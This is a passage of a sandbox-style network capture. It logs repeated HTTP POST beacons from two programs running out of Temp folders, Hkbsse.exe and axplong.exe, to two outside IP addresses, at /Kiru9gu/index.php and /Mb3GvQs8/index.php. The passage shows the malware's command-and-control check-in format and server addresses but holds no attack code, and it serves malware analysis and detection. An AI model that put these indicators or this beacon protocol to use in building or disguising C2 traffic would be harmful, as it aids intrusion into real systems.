Jun 24, 2024 00:11:00.654145956 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 24, 2024 00:11:01.364063978 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:11:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 24, 2024 00:11:01.378540993 CEST	306	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 39 41 33 34 36 43 33 46 42 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6CCF9A346C3FBFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jun 24, 2024 00:11:01.604077101 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:11:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
79	192.168.2.5	52941	185.172.128.116	80	3664	C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Jun 24, 2024 00:11:00.946685076 CEST	157	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 24, 2024 00:11:01.590665102 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:11:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 24, 2024 00:11:01.591460943 CEST	311	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 34 34 39 43 45 46 43 31 42 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5449CEFC1BA2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
Jun 24, 2024 00:11:01.792856932 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:11:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
80	192.168.2.5	52943	77.91.77.81	80	6024	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jun 24, 2024 00:11:01.713999033 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 24, 2024 00:11:02.426249981 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:11:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 24, 2024 00:11:02.426920891 CEST	306	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 39 41 33 34 36 43 33 46 42 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6CCF9A346C3FBFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jun 24, 2024 00:11:02.641854048 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:11:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
81	192.168.2.5	52944	185.172.128.116	80	3664	C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Jun 24, 2024 00:11:01.902910948 CEST	157	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 24, 2024 00:11:02.542623997 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:11:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 24, 2024 00:11:02.543324947 CEST	311	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 34 34 39 43 45 46 43 31 42 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5449CEFC1BA2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
Jun 24, 2024 00:11:02.734603882 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:11:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
82	192.168.2.5	52945	77.91.77.81	80	6024	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jun 24, 2024 00:11:02.769954920 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 24, 2024 00:11:03.451848984 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:11:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 24, 2024 00:11:03.477006912 CEST	306	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 39 41 33 34 36 43 33 46 42 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6CCF9A346C3FBFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jun 24, 2024 00:11:03.693367004 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:11:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
83	192.168.2.5	52946	185.172.128.116	80	3664	C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Jun 24, 2024 00:11:02.853411913 CEST	157	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 24, 2024 00:11:03.506700039 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:11:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 24, 2024 00:11:03.507381916 CEST	311	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 34 34 39 43 45 46 43 31 42 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5449CEFC1BA2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
Jun 24, 2024 00:11:03.704581022 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:11:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
84	192.168.2.5	52947	77.91.77.81	80	6024	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jun 24, 2024 00:11:03.803849936 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 24, 2024 00:11:04.482683897 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:11:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
85	192.168.2.5	52948	185.172.128.116	80	3664	C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Jun 24, 2024 00:11:03.817197084 CEST	157	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 24, 2024 00:11:04.449853897 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:11:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 24, 2024 00:11:04.455647945 CEST	311	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 34 34 39 43 45 46 43 31 42 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5449CEFC1BA2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
Jun 24, 2024 00:11:04.647938013 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:11:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
86	192.168.2.5	52949	77.91.77.81	80	6024	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jun 24, 2024 00:11:04.493407965 CEST	306	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 39 41 33 34 36 43 33 46 42 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6CCF9A346C3FBFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jun 24, 2024 00:11:05.199668884 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:11:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
87	192.168.2.5	52950	185.172.128.116	80	3664	C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Jun 24, 2024 00:11:04.772026062 CEST	157	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 24, 2024 00:11:05.425568104 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:11:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 24, 2024 00:11:05.426553965 CEST	311	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 34 34 39 43 45 46 43 31 42 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5449CEFC1BA2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
Jun 24, 2024 00:11:05.621793032 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:11:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
88	192.168.2.5	52951	77.91.77.81	80	6024	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jun 24, 2024 00:11:05.319556952 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 24, 2024 00:11:06.117847919 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:11:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
89	192.168.2.5	52952	185.172.128.116	80	3664	C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Jun 24, 2024 00:11:05.741261005 CEST	157	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 24, 2024 00:11:06.375859976 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:11:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 24, 2024 00:11:06.376780987 CEST	311	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 34 34 39 43 45 46 43 31 42 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5449CEFC1BA2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
Jun 24, 2024 00:11:06.712129116 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:11:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
90	192.168.2.5	52953	77.91.77.81	80	6024	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jun 24, 2024 00:11:06.130522966 CEST	306	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 39 41 33 34 36 43 33 46 42 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6CCF9A346C3FBFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jun 24, 2024 00:11:06.833266973 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:11:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
91	192.168.2.5	52954	185.172.128.116	80	3664	C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Jun 24, 2024 00:11:06.832694054 CEST	157	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 24, 2024 00:11:07.470036030 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:11:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 24, 2024 00:11:07.473262072 CEST	311	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 34 34 39 43 45 46 43 31 42 41 32 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5449CEFC1BA2DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
Jun 24, 2024 00:11:07.665944099 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:11:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
92	192.168.2.5	52955	77.91.77.81	80	6024	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jun 24, 2024 00:11:06.953385115 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 24, 2024 00:11:07.650866032 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 23 Jun 2024 22:11:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
93	192.168.2.5	52956	77.91.77.81	80	6024	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
